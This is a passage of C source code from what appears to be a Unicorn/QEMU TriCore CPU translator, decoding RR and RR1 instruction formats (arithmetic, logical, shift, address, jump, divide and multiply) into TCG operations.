tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SUBS_H: gen_helper_sub_h_ssov(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SUBS_HU: gen_helper_sub_h_suov(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SUBX: gen_sub_CC(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_XOR_EQ: gen_accumulating_cond(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_xor_tl); break; case OPC2_32_RR_XOR_GE: gen_accumulating_cond(ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_xor_tl); break; case OPC2_32_RR_XOR_GE_U: gen_accumulating_cond(ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_xor_tl); break; case OPC2_32_RR_XOR_LT: gen_accumulating_cond(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_xor_tl); break; case OPC2_32_RR_XOR_LT_U: gen_accumulating_cond(ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_xor_tl); break; case OPC2_32_RR_XOR_NE: gen_accumulating_cond(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], &tcg_gen_xor_tl); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_rr_logical_shift(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r3, r2, r1; TCGv temp; r3 = MASK_OP_RR_D(ctx->opcode); r2 = MASK_OP_RR_S2(ctx->opcode); r1 = MASK_OP_RR_S1(ctx->opcode); temp = tcg_temp_new(tcg_ctx); op2 = MASK_OP_RR_OP2(ctx->opcode); switch (op2) { case OPC2_32_RR_AND: tcg_gen_and_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ANDN: tcg_gen_andc_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_CLO: tcg_gen_not_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1]); tcg_gen_clzi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3], TARGET_LONG_BITS); break; case OPC2_32_RR_CLO_H: gen_helper_clo_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_CLS: tcg_gen_clrsb_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_CLS_H: gen_helper_cls_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_CLZ: tcg_gen_clzi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], TARGET_LONG_BITS); break; case OPC2_32_RR_CLZ_H: gen_helper_clz_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_NAND: tcg_gen_nand_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_NOR: tcg_gen_nor_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_OR: tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_ORN: tcg_gen_orc_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SH: gen_helper_sh(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SH_H: gen_helper_sh_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SHA: gen_helper_sha(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SHA_H: gen_helper_sha_h(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_SHAS: gen_shas(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_XNOR: tcg_gen_eqv_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_XOR: tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); } static void decode_rr_address(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2, n; int r1, r2, r3; TCGv temp; op2 = MASK_OP_RR_OP2(ctx->opcode); r3 = MASK_OP_RR_D(ctx->opcode); r2 = MASK_OP_RR_S2(ctx->opcode); r1 = MASK_OP_RR_S1(ctx->opcode); n = MASK_OP_RR_N(ctx->opcode); switch (op2) { case OPC2_32_RR_ADD_A: tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r3], tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2]); break; case OPC2_32_RR_ADDSC_A: temp = tcg_temp_new(tcg_ctx); tcg_gen_shli_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], n); tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r3], tcg_ctx->cpu_gpr_a[r2], temp); tcg_temp_free(tcg_ctx, temp); break; case OPC2_32_RR_ADDSC_AT: temp = tcg_temp_new(tcg_ctx); tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 3); tcg_gen_add_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], temp); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r3], temp, 0xFFFFFFFC); tcg_temp_free(tcg_ctx, temp); break; case OPC2_32_RR_EQ_A: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2]); break; case OPC2_32_RR_EQZ: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_a[r1], 0); break; case OPC2_32_RR_GE_A: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2]); break; case OPC2_32_RR_LT_A: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2]); break; case OPC2_32_RR_MOV_A: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r3], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_MOV_AA: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r3], tcg_ctx->cpu_gpr_a[r2]); break; case OPC2_32_RR_MOV_D: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_a[r2]); break; case OPC2_32_RR_NE_A: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2]); break; case OPC2_32_RR_NEZ_A: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_a[r1], 0); break; case OPC2_32_RR_SUB_A: tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r3], tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2]); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_rr_idirect(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1; op2 = MASK_OP_RR_OP2(ctx->opcode); r1 = MASK_OP_RR_S1(ctx->opcode); switch (op2) { case OPC2_32_RR_JI: tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_PC, tcg_ctx->cpu_gpr_a[r1], ~0x1); break; case OPC2_32_RR_JLI: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[11], ctx->pc_succ_insn); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_PC, tcg_ctx->cpu_gpr_a[r1], ~0x1); break; case OPC2_32_RR_CALLI: gen_helper_1arg(tcg_ctx, call, ctx->pc_succ_insn); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_PC, tcg_ctx->cpu_gpr_a[r1], ~0x1); break; case OPC2_32_RR_FCALLI: gen_fcall_save_ctx(ctx); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_PC, tcg_ctx->cpu_gpr_a[r1], ~0x1); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_gen_exit_tb(tcg_ctx, NULL, 0); ctx->base.is_jmp = DISAS_NORETURN; } static void decode_rr_divide(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; TCGv temp, temp2, temp3; op2 = MASK_OP_RR_OP2(ctx->opcode); r3 = MASK_OP_RR_D(ctx->opcode); r2 = MASK_OP_RR_S2(ctx->opcode); r1 = MASK_OP_RR_S1(ctx->opcode); switch (op2) { case OPC2_32_RR_BMERGE: gen_helper_bmerge(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_BSPLIT: CHECK_REG_PAIR(r3); gen_bsplit(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_DVINIT_B: CHECK_REG_PAIR(r3); gen_dvinit_b(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_DVINIT_BU: temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); temp3 = tcg_temp_new(tcg_ctx); CHECK_REG_PAIR(r3); tcg_gen_shri_tl(tcg_ctx, temp3, tcg_ctx->cpu_gpr_d[r1], 8); /* reset av */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, 0); if (!has_feature(ctx, TRICORE_FEATURE_131)) { /* overflow = (abs(D[r3+1]) >= abs(D[r2])) */ tcg_gen_abs_tl(tcg_ctx, temp, temp3); tcg_gen_abs_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->cpu_PSW_V, temp, temp2); } else { /* overflow = (D[b] == 0) */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_gpr_d[r2], 0); } tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* sv */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* write result */ tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], 24); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3+1], temp3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); break; case OPC2_32_RR_DVINIT_H: CHECK_REG_PAIR(r3); gen_dvinit_h(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_DVINIT_HU: temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); temp3 = tcg_temp_new(tcg_ctx); CHECK_REG_PAIR(r3); tcg_gen_shri_tl(tcg_ctx, temp3, tcg_ctx->cpu_gpr_d[r1], 16); /* reset av */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, 0); if (!has_feature(ctx, TRICORE_FEATURE_131)) { /* overflow = (abs(D[r3+1]) >= abs(D[r2])) */ tcg_gen_abs_tl(tcg_ctx, temp, temp3); tcg_gen_abs_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->cpu_PSW_V, temp, temp2); } else { /* overflow = (D[b] == 0) */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_gpr_d[r2], 0); } tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* sv */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* write result */ tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3+1], temp3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); break; case OPC2_32_RR_DVINIT: temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); CHECK_REG_PAIR(r3); /* overflow = ((D[b] == 0) || ((D[b] == 0xFFFFFFFF) && (D[a] == 0x80000000))) */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp, tcg_ctx->cpu_gpr_d[r2], 0xffffffff); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp2, tcg_ctx->cpu_gpr_d[r1], 0x80000000); tcg_gen_and_tl(tcg_ctx, temp, temp, temp2); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp2, tcg_ctx->cpu_gpr_d[r2], 0); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, temp, temp2); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* sv */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* reset av */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, 0); /* write result */ tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1]); /* sign extend to high reg */ tcg_gen_sari_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], 31); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); break; case OPC2_32_RR_DVINIT_U: /* overflow = (D[b] == 0) */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_gpr_d[r2], 0); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* sv */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* reset av */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, 0); /* write result */ tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1]); /* zero extend to high reg*/ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3+1], 0); break; case OPC2_32_RR_PARITY: gen_helper_parity(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_UNPACK: CHECK_REG_PAIR(r3); gen_unpack(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_CRC32: if (has_feature(ctx, TRICORE_FEATURE_161)) { gen_helper_crc32(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC2_32_RR_DIV: if (has_feature(ctx, TRICORE_FEATURE_16)) { GEN_HELPER_RR(tcg_ctx, divide, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC2_32_RR_DIV_U: if (has_feature(ctx, TRICORE_FEATURE_16)) { GEN_HELPER_RR(tcg_ctx, divide_u, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC2_32_RR_MUL_F: gen_helper_fmul(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_DIV_F: gen_helper_fdiv(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_CMP_F: gen_helper_fcmp(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR_FTOI: gen_helper_ftoi(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_ITOF: gen_helper_itof(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_FTOUZ: gen_helper_ftouz(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_UPDFL: gen_helper_updfl(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_UTOF: gen_helper_utof(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_FTOIZ: gen_helper_ftoiz(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RR_QSEED_F: gen_helper_qseed(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1]); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* RR1 Format */ static void decode_rr1_mul(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; TCGv n; TCGv_i64 temp64; r1 = MASK_OP_RR1_S1(ctx->opcode); r2 = MASK_OP_RR1_S2(ctx->opcode); r3 = MASK_OP_RR1_D(ctx->opcode); n = tcg_const_i32(tcg_ctx, MASK_OP_RR1_N(ctx->opcode)); op2 = MASK_OP_RR1_OP2(ctx->opcode); switch (op2) { case OPC2_32_RR1_MUL_H_32_LL: temp64 = tcg_temp_new_i64(tcg_ctx); CHECK_REG_PAIR(r3); GEN_HELPER_LL(tcg_ctx, mul_h, temp64, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); tcg_gen_extr_i64_i32(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp64); gen_calc_usb_mul_h(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1]); tcg_temp_free_i64(tcg_ctx, temp64); break; case OPC2_32_RR1_MUL_H_32_LU: temp64 = tcg_temp_new_i64(tcg_ctx); CHECK_REG_PAIR(r3); GEN_HELPER_LU(tcg_ctx, mul_h, temp64, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); tcg_gen_extr_i64_i32(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp64); gen_calc_usb_mul_h(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1]); tcg_temp_free_i64(tcg_ctx, temp64); break; case OPC2_32_RR1_MUL_H_32_UL: temp64 = tcg_temp_new_i64(tcg_ctx); CHECK_REG_PAIR(r3); GEN_HELPER_UL(tcg_ctx, mul_h, temp64, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); tcg_gen_extr_i64_i32(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp64); gen_calc_usb_mul_h(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1]); tcg_temp_free_i64(tcg_ctx, temp64); break; case OPC2_32_RR1_MUL_H_32_UU: temp64 = tcg_temp_new_i64(tcg_ctx); CHECK_REG_PAIR(r3); GEN_HELPER_UU(tcg_ctx, mul_h, temp64, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); tcg_gen_extr_i64_i32(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp64); gen_calc_usb_mul_h(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1]); tcg_temp_free_i64(tcg_ctx, temp64); break; case OPC2_32_RR1_MULM_H_64_LL: temp64 = tcg_temp_new_i64(tcg_ctx); CHECK_REG_PAIR(r3); GEN_HELPER_LL(tcg_ctx, mulm_h, temp64, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); tcg_gen_extr_i64_i32(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp64); /* reset V bit */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); /* reset AV bit */ tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_V); tcg_temp_free_i64(tcg_ctx, temp64); break; case OPC2_32_RR1_MULM_H_64_LU: temp64 = tcg_temp_new_i64(tcg_ctx); CHECK_REG_PAIR(r3); GEN_HELPER_LU(tcg_ctx, mulm_h, temp64, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); tcg_gen_extr_i64_i32(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp64); /* reset V bit */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); /* reset AV bit */ tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_V); tcg_temp_free_i64(tcg_ctx, temp64); break; case OPC2_32_RR1_MULM_H_64_UL: temp64 = tcg_temp_new_i64(tcg_ctx); CHECK_REG_PAIR(r3); GEN_HELPER_UL(tcg_ctx, mulm_h, temp64, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); tcg_gen_extr_i64_i32(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp64); /* reset V bit */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); /* reset AV bit */ tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_V); tcg_temp_free_i64(tcg_ctx, temp64); break; case OPC2_32_RR1_MULM_H_64_UU: temp64 = tcg_temp_new_i64(tcg_ctx); CHECK_REG_PAIR(r3); GEN_HELPER_UU(tcg_ctx, mulm_h, temp64, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); tcg_gen_extr_i64_i32(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp64); /* reset V bit */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); /* reset AV bit */ tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_V); tcg_temp_free_i64(tcg_ctx, temp64); break; case OPC2_32_RR1_MULR_H_16_LL: GEN_HELPER_LL(tcg_ctx, mulr_h, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); gen_calc_usb_mulr_h(ctx, tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RR1_MULR_H_16_LU: GEN_HELPER_LU(tcg_ctx, mulr_h, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); gen_calc_usb_mulr_h(ctx, tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RR1_MULR_H_16_UL: GEN_HELPER_UL(tcg_ctx, mulr_h, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); gen_calc_usb_mulr_h(ctx, tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RR1_MULR_H_16_UU: GEN_HELPER_UU(tcg_ctx, mulr_h, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); gen_calc_usb_mulr_h(ctx, tcg_ctx->cpu_gpr_d[r3]); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, n); } static void decode_rr1_mulq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; uint32_t n; TCGv temp, temp2; r1 = MASK_OP_RR1_S1(ctx->opcode); r2 = MASK_OP_RR1_S2(ctx->opcode); r3 = MASK_OP_RR1_D(ctx->opcode); n = MASK_OP_RR1_N(ctx->opcode); op2 = MASK_OP_RR1_OP2(ctx->opcode); temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); switch (op2) { case OPC2_32_RR1_MUL_Q_32: gen_mul_q(ctx, tcg_ctx->cpu_gpr_d[r3], temp, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, 32); break; case OPC2_32_RR1_MUL_Q_64: CHECK_REG_PAIR(r3); gen_mul_q(ctx, tcg_ctx->cpu_gpr_d[r3], 